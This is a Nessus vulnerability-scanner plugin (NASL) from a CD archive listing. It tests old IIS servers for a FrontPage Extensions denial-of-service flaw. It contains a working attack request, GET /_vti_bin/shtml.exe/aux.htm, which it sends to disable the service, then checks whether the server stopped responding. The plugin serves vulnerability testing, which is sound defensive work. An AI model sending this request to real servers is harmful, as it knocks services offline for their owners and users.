home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / frontpage_dos.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.9 KB  |  108 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10497);
  10.  script_bugtraq_id(1608);
  11.  script_version ("$Revision: 1.14 $");
  12.  script_cve_id("CAN-2000-0709");
  13.  
  14.  name["english"] = "Microsoft Frontpage DoS";
  15.  name["francais"] = "DΘni de service Microsoft Frontpage"; 
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. It is possible to disable the remote frontpage extensions
  20. by requesting a URL containing the name of a DOS device
  21. through shtml.exe, as :
  22.     GET /_vti_bin/shtml.exe/aux.htm
  23.     
  24. An attacker may use this flaw to prevent anyone to change
  25. this website using frontpage.
  26.  
  27. Solution : Upgrade to FP 1.2
  28. Risk factor : High";
  29.  
  30.  desc["francais"] = "
  31. Il est possible de dΘsactiver les extensions frontpage
  32. du site distant en faisant la requΦte d'une URL contenant
  33. le nom d'un pΘriphΘrique DOS, en passant par shtml.exe, comme
  34. dans :
  35.     GET /_vti_bin/shtml.exe/aux.htm
  36.     
  37. Un pirate peut utiliser ce problΦme pour empecher qui que ce
  38. soit de changer de site web par l'intermediaire de FrontPage
  39.  
  40. Solution : Mettez FrontPage α jour en version 1.2
  41. Facteur de risque : SΘrieux";
  42.  
  43.  
  44.  script_description(english:desc["english"], francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Disables Microsoft Frontpage extensions";
  47.  summary["francais"] = "DΘsactive les extensions Frontpage";
  48.  script_summary(english:summary["english"], francais:summary["francais"]);
  49.  
  50.  script_category(ACT_DENIAL);
  51.  
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  54.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  script_family(english:family["english"], francais:family["francais"]);
  58.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  59.  script_require_ports("Services/www", 80);
  60.  exit(0);
  61. }
  62.  
  63. #
  64. # The script code starts here
  65. #
  66.  
  67. include("http_func.inc");
  68.  
  69. port = get_http_port(default:80);
  70.  
  71. sig = get_kb_item("www/hmap/" + port + "/description");
  72. if ( sig && "IIS" >!< sig ) exit(0);
  73.  
  74. if(get_port_state(port))
  75. {
  76.  soc = http_open_socket(port);
  77.   if(soc)
  78.   {
  79.  
  80.     name = get_host_name();
  81.     req1 = http_get(item:"/_vti_bin/shtml.exe",
  82.                  port:port);
  83.             
  84.     req2 = http_get(item:"/_vti_bin/shtml.exe/aux.htm",
  85.                  port:port);
  86.   
  87.     send(socket:soc, data:req1);
  88.     r1 = recv_line(socket:soc, length:1024);
  89.     http_close_socket(soc);
  90.     if(ereg(pattern:"HTTP/[0-9]\.[0-9] 200 .*", 
  91.             string:r1))
  92.     {        
  93.     soc = http_open_socket(port);
  94.     send(socket:soc, data:req2);
  95.     r2 = recv_line(socket:soc, length:1024);
  96.     http_close_socket(soc);
  97.  
  98.     soc = http_open_socket(port);
  99.     send(socket:soc, data:req1);
  100.     r3 = recv_line(socket:soc, length:1024);
  101.     http_close_socket(soc);
  102.     
  103.     if(!r3)security_hole(port);
  104.     }
  105.   }
  106. }
  107.     
  108.